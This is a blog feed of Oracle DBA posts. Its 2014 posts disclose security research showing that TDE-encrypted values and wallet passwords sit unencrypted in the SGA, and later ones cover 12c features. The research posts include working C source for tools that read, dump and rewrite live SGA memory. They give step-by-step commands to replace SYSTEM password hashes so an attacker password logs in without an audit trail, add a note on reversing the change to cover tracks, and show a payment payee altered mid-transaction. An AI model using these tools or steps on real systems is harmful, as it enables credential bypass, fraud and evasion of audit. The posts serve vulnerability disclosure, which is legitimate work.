ContractOracle

Contract Oracle Limited is not affiliated with Oracle Corporation.

ContractOracle.com is for sale

Sun, 2018-01-28 20:30
If you would like to purchase this domain, email Robert.Geier@ContractOracle.com

This domain is perfect if you are a contractor working with Oracle software. 

Oracle encrypted table data found unencrypted in SGA

Sun, 2014-07-13 22:29
When data needs to be kept private, or companies are worried about data leakage, they often choose to store that data in encrypted table columns using Oracle Transparent Data Encryption (TDE).

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all three of the card_number values used in the demonstration can be found in the SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from the SGA, but flushing the shared pool did.  Further analysis is needed to confirm exactly where in the shared pool the unencrypted data is stored, and whether it sits in SQL statements, SQL variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping SQL in PL/SQL.  In the meantime, be aware that data you believe to be encrypted may actually be stored in memory in clear text, visible to anyone with privileges to read the SGA.
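
The sga_search program used above is not listed anywhere in this feed, so for reference here is a minimal, read-only sketch of how such a tool could work, modelled on the sga_data_replace program listed in a later post.  The original source may differ, so treat the details below as assumptions.  Compile with something like "gcc sga_search.c -o sga_search -lrt".

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

int main(int argc, char *argv[])
{
    printf("USAGE :- sga_search searchstring\n\n\n");
    if (argc != 2)
        return 1;
    printf("Number of input parameters seem correct.\n");
    printf("SEARCH FOR   :- %s\n", argv[1]);

    long len = strlen(argv[1]);
    DIR *d = opendir("/dev/shm");
    struct dirent *dir;

    if (d == NULL)
        return 1;
    while ((dir = readdir(d)) != NULL) {
        /* only look at Oracle SGA segments */
        if (strstr(dir->d_name, "ora") == NULL)
            continue;
        int fd = shm_open(dir->d_name, O_RDONLY, 0660);
        if (fd == -1)
            continue;
        struct stat st;
        if (fstat(fd, &st) == -1 || st.st_size < len) {
            close(fd);
            continue;
        }
        /* map the segment read-only and scan it byte by byte */
        char *data = mmap(0, st.st_size, PROT_READ, MAP_SHARED, fd, 0);
        if (data != MAP_FAILED) {
            long i, j;
            for (i = 0; i <= st.st_size - len; i++) {
                for (j = 0; j < len; j++)
                    if (data[i + j] != argv[1][j])
                        break;
                if (j == len)
                    printf("/dev/shm/%s found string at %ld\n%s\n",
                           dir->d_name, i, argv[1]);
            }
            munmap(data, st.st_size);
        }
        close(fd);
    }
    closedir(d);
    return 0;
}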

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
It states that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."

Oracle encryption wallet password found in SGA

Sun, 2014-07-13 21:51
If companies are worried about data privacy or leakage, they are often advised to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and to implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Data Encryption, which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow-table and brute-force attacks, and keeping the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-

[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1

The search found the password in the SGA, so it should be possible to analyse the memory structure that currently stores the known password and create another program to extract passwords directly on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so I don't know how difficult it would be, but if the password is stored it will be possible to extract it; even if it is mixed up with a lot of other SQL text and variables, it would be very simple to just try opening the wallet using every string stored in the SGA.

The password is still in SGA after flushing the buffer cache.

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1


After flushing the shared pool the password is no longer available.  

CDB$ROOT@ORCL> alter system flush shared_pool;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
[oracle@localhost shared_memory]$ 

As this password should be secret, Oracle really should not store it in memory.  More research is needed to confirm whether the password can be hidden by using bind variables, obfuscation, or wrapping it in PL/SQL.

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

Fri, 2014-07-11 04:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database-level security.  The following example expands on that to show how to modify password hashes in the SGA, allowing connection to the database without changing passwords in the datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from a datafile or the SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now log in using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in the SGA were updated, that the database did not crash or detect the change, and that direct login with the modified hashes was allowed.  Since the change was only made to data in memory, there is no audit record and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back out the changes, restoring the original hash values in the SGA, to cover up completely.
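
Since the tool simply swaps equal-length byte patterns, backing the change out should just be a matter of re-running the same commands with the search and replace parameters reversed, e.g. for the first hash pair (untested here) :-

./sga_data_replace E235D5FC5165F1EC 09F3A178C7F6F650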

Sample output from the first SGA update command above follows :-

[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do

C program to find/replace data in Oracle SGA.

Fri, 2014-07-11 03:49
Following is a proof-of-concept program to change data in Oracle shared memory mapped to /dev/shm.
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.  I have tested it on Linux against Oracle 12c databases, changing data in the SGA without crashing the database, and it should also work against 11g.  It won't work against Oracle versions prior to 11g, as they manage shared memory in a different manner (sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/mman.h>

void replace_sga(char search_string[], char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  long i;
  int j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      /* Oracle SGA segments in /dev/shm have "ora" in their names */
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        /* The program exits on the first empty segment it meets, which is
           why the sample output ends with this message. */
        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        /* Map the segment read-write so replacements are applied in place
           to the running instance's memory. */
        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        /* Stop search_length bytes before the end of the mapping to avoid
           reading past it. */
        for (i = 0; i <= fileInfo.st_size - search_length; i++)
        {
          for (j = 0; j < search_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j == search_length)
          {
            printf("/dev/shm/%s replace string at %ld\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];
            }
          }
        }
        munmap(data, fileInfo.st_size);
        close(fd);
      }
    }
    closedir(d);
  }
}

int main(int argc, char *argv[])
{
  printf("\n\n\nWARNING WARNING WARNING\n\n\n");
  printf("This program may crash or corrupt your Oracle database!!! ");
  printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
  printf("Anyone may copy or modify the code provided.\n\n\n");
  printf("USAGE :- sga_data_replace searchstring replacestring\n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters with the same number of characters.\n");
  }
  return 0;
}


Sample output from program to update data in Oracle shared memory.

Fri, 2014-07-11 03:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in the SGA was changed, and the data on disk remained untouched (verified by flushing the buffer cache and forcing a re-read from disk).


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do


Direct update of Oracle data in SGA to avoid audit.

Thu, 2014-07-10 05:42
Vendors sell some rather expensive software for auditing Oracle databases, and for coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in the datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  

It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.

Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses, etc.
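
The in-memory change in the transcript below was made from a second session on the database server, between the insert and the first select, using the find/replace program listed in the posts above; the invocation is the same as in the sample output post, e.g. :-

./sga_data_replace vendor badguy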

PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.

C program to dump shared memory segments to disk on Linux.

Tue, 2014-07-08 02:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12c databases, as they use mmap instead of shmat for managing shared memory; a sample program for reading from 11g and 12c is here (mmap example ).

Compile it using "gcc -o shared shared.c".  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.

Check the format of the include lines below if you have issues compiling, as blogging platforms can strip hashes and greater-than/less-than symbols.

#include <stdio.h>
#include <stdlib.h>
#include <sys/shm.h>


int main (int argc, char *argv[]) {
    int maxkey, id, shmid = 0;
    struct shm_info shm_info;
    struct shmid_ds shmds;
    void * shared_data;
    FILE * outfile;

    /* SHM_INFO returns the index of the highest shared memory entry in use */
    maxkey = shmctl(0, SHM_INFO, (struct shmid_ds *) &shm_info);
    for(id = 0; id <= maxkey; id++) {
        shmid = shmctl(id, SHM_STAT, &shmds);
        if (shmid < 0)
            continue;
        char shmidchar[16];
        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);
        if(shmds.shm_segsz > 0) {
            printf("Shared memory segment %s found.\n",shmidchar);

            /* attach read-only; shmat returns (void *) -1 on failure, not NULL */
            shared_data = shmat(shmid, NULL, SHM_RDONLY);
            if(shared_data != (void *) -1) {
                outfile = fopen(shmidchar, "wb");
                if(outfile == NULL) {
                    printf("Could not open file %s for writing.", shmidchar);
                }
                else {
                    /* dump the whole segment to a file named after the shmid */
                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);
                    fclose(outfile);

                    printf("Dumped to file %s\n\n", shmidchar);
                }
                shmdt(shared_data);
            }
        }
    }
    return 0;
}
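
As a hypothetical usage example (the segment id below is made up; the program names each dump file after the shmid it finds), the dumps can then be searched offline with standard tools :-

gcc -o shared shared.c
./shared
strings 3244039 | grep -i secret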




Oracle 12c New Features - Convert a database to be Pluggable

Mon, 2013-07-01 22:08
In a previous blog post I demonstrated creating a Pluggable Database (PDB) from the PDB$SEED database which is created at the same time as the Container Database (CDB).  That process was quick and easy, but is only useful for creating new empty databases.

If we want to migrate existing databases which contain data (e.g. upgraded from 11g) to the CDB/PDB multitenant architecture, we need to convert them to be PDBs so we can plug them in.

For this example I created a stand-alone database called NONCDB.

[oracle@rac1 T12]$ export ORACLE_SID=NONCDB
[oracle@rac1 T12]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Tue Jul 2 10:31:54 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

We can see in v$database that it is not a CDB or PDB.

SQL> select CDB from v$database;

CDB
---
NO

To convert it to be a PDB we first need to get the database in a consistent state and run DBMS_PDB.DESCRIBE to create an XML file to describe the database.


SQL> shutdown immediate;

Database closed.

Database dismounted.
ORACLE instance shut down.
SQL> startup mount;
ORACLE instance started.

Total System Global Area 1235959808 bytes
Fixed Size                  2287816 bytes
Variable Size             452986680 bytes
Database Buffers          771751936 bytes
Redo Buffers                8933376 bytes
Database mounted.
SQL> alter database open read only;

Database altered.

SQL> BEGIN
  2    DBMS_PDB.DESCRIBE(
  3      pdb_descr_file => '/u01/app/oracle/oradata/NONCDB/noncdb.xml');
  4  END;
  5  /

PL/SQL procedure successfully completed.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> exit

Now we can plug NONCDB into an existing CDB database, T12.

[oracle@rac1 T12]$ export ORACLE_SID=T12
[oracle@rac1 T12]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Tue Jul 2 10:42:01 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> select CDB from v$database;

CDB
---
YES

I am plugging the database into a CDB on the same server as the original database, so I will create the PDB with NOCOPY TEMPFILE REUSE.  If you are changing directory structures then you would need to use FILE_NAME_CONVERT.

SQL> CREATE PLUGGABLE DATABASE NONCDB USING '/u01/app/oracle/oradata/NONCDB/noncdb.xml' NOCOPY tempfile reuse;

Pluggable database created.

Now we need to update the data dictionary in the new PDB by running noncdb_to_pdb.sql

SQL> alter session set container=NONCDB;

Session altered.

SQL> @$ORACLE_HOME/rdbms/admin/noncdb_to_pdb.sql

This script produces a lot of output, which I will not show, but unfortunately it ended with an error :-

SQL> -- get rid of idl_ub1$ rows for MDL java objects
SQL> delete from sys.idl_ub1$ where obj# in (select obj# from sys.obj$ where bitand(flags, 65536)=65536 and type# in (28,29,30,56));
^Cdelete from sys.idl_ub1$ where obj# in (select obj# from sys.obj$ where bitand(flags, 65536)=65536 and type# in (28,29,30,56))
                *
ERROR at line 1:
ORA-01013: user requested cancel of current operation

The new PDB was left in READ WRITE state after the script exited and seems usable, but due to the error I can't be sure everything completed OK so it would be worth checking with Oracle Support.


SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
NONCDB                         READ WRITE

SQL> alter session set container=NONCDB;

Session altered.

SQL> create user test identified by test;

User created.

We can see that by converting the existing database to a PDB, only the SYSTEM, SYSAUX, and USERS tablespaces were kept; the UNDO datafile, the original redo logs, and the control files are no longer used by the PDB, although they remain on disk.

SQL> select file_name from dba_data_files;

FILE_NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/NONCDB/system01.dbf
/u01/app/oracle/oradata/NONCDB/sysaux01.dbf
/u01/app/oracle/oradata/NONCDB/users01.dbf


[oracle@rac1 NONCDB]$ pwd
/u01/app/oracle/oradata/NONCDB
[oracle@rac1 NONCDB]$ ls -lrt
total 1712016
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:30 redo03.log
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:30 redo02.log
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:36 redo01.log
-rw-r----- 1 oracle oinstall  57679872 Jul  2 10:37 undotbs01.dbf
-rw-r--r-- 1 oracle oinstall      3986 Jul  2 10:38 noncdb.xml
-rw-r----- 1 oracle oinstall  10043392 Jul  2 10:39 control02.ctl
-rw-r----- 1 oracle oinstall  10043392 Jul  2 10:39 control01.ctl
-rw-r----- 1 oracle oinstall  62922752 Jul  2 10:45 temp01.dbf
-rw-r----- 1 oracle oinstall   5251072 Jul  2 11:03 users01.dbf
-rw-r----- 1 oracle oinstall 807411712 Jul  2 11:03 system01.dbf
-rw-r----- 1 oracle oinstall 702554112 Jul  2 11:03 sysaux01.dbf

Oracle 12c New Features - Query CDB_PDB_HISTORY for Pluggable Database History

Mon, 2013-07-01 03:45
If you are interested in checking the history of PDBs, the view CDB_PDB_HISTORY is a good place to start.

SQL> SELECT DB_NAME, CON_ID, PDB_NAME, OPERATION, OP_TIMESTAMP, CLONED_FROM_PDB_NAME
FROM CDB_PDB_HISTORY WHERE CON_ID > 2 ORDER BY 5;  

DB_NAME    CON_ID PDB_NAME        OPERATION        OP_TIMESTA CLONED_FROM_PDB
---------- ------ --------------- ---------------- ---------- ---------------
SEEDDATA        5 PDB$SEED        UNPLUG           24-MAY-13
SEEDDATA        3 PDB$SEED        UNPLUG           24-MAY-13
SEEDDATA        4 PDB$SEED        UNPLUG           24-MAY-13
T12             5 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             3 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             4 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             5 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             3 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             4 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             4 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             4 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             4 PDB2            PLUG             01-JUL-13  PDB1
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB3            CLONE            01-JUL-13  PDB1


Oracle 12c New Features - TEMP_UNDO_ENABLED

Mon, 2013-07-01 01:12
Oracle 12c introduces the new parameter TEMP_UNDO_ENABLED, which can be set at the database or session level.  If this parameter is enabled, undo for temporary objects (e.g. global temporary tables) is written to the TEMP tablespace, rather than to the UNDO tablespace as is the default.  This can improve performance and reduce UNDO and REDO.

SQL> connect test/test@pdb1
Connected.

SQL> CREATE GLOBAL TEMPORARY TABLE my_temp_table (id integer) ON COMMIT PRESERVE ROWS;

Table created.

SQL> show parameter temp_undo_enabled

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------------
temp_undo_enabled                    boolean     FALSE

Now run an insert into the global temporary table with the parameter set to FALSE.

SQL> set autotrace on statistics
SQL> insert into my_temp_table values (1);

1 row created.


Statistics
----------------------------------------------------------
          1  recursive calls
          8  db block gets
          1  consistent gets
          0  physical reads
        312  redo size
        853  bytes sent via SQL*Net to client
        837  bytes received via SQL*Net from client
          3  SQL*Net roundtrips to/from client
          1  sorts (memory)
          0  sorts (disk)
          1  rows processed

According to the Autotrace statistics this generates 312 bytes of redo.

SQL> connect test/test@pdb1
Connected.
SQL> alter session set temp_undo_enabled=true;

Session altered.

Now run the insert again with the parameter set to TRUE.  

SQL> set autotrace on statistics
SQL> insert into my_temp_table values (1);

1 row created.


Statistics
----------------------------------------------------------
          3  recursive calls
         13  db block gets
          1  consistent gets
          0  physical reads
        280  redo size
        850  bytes sent via SQL*Net to client
        837  bytes received via SQL*Net from client
          3  SQL*Net roundtrips to/from client
          1  sorts (memory)
          0  sorts (disk)
          1  rows processed

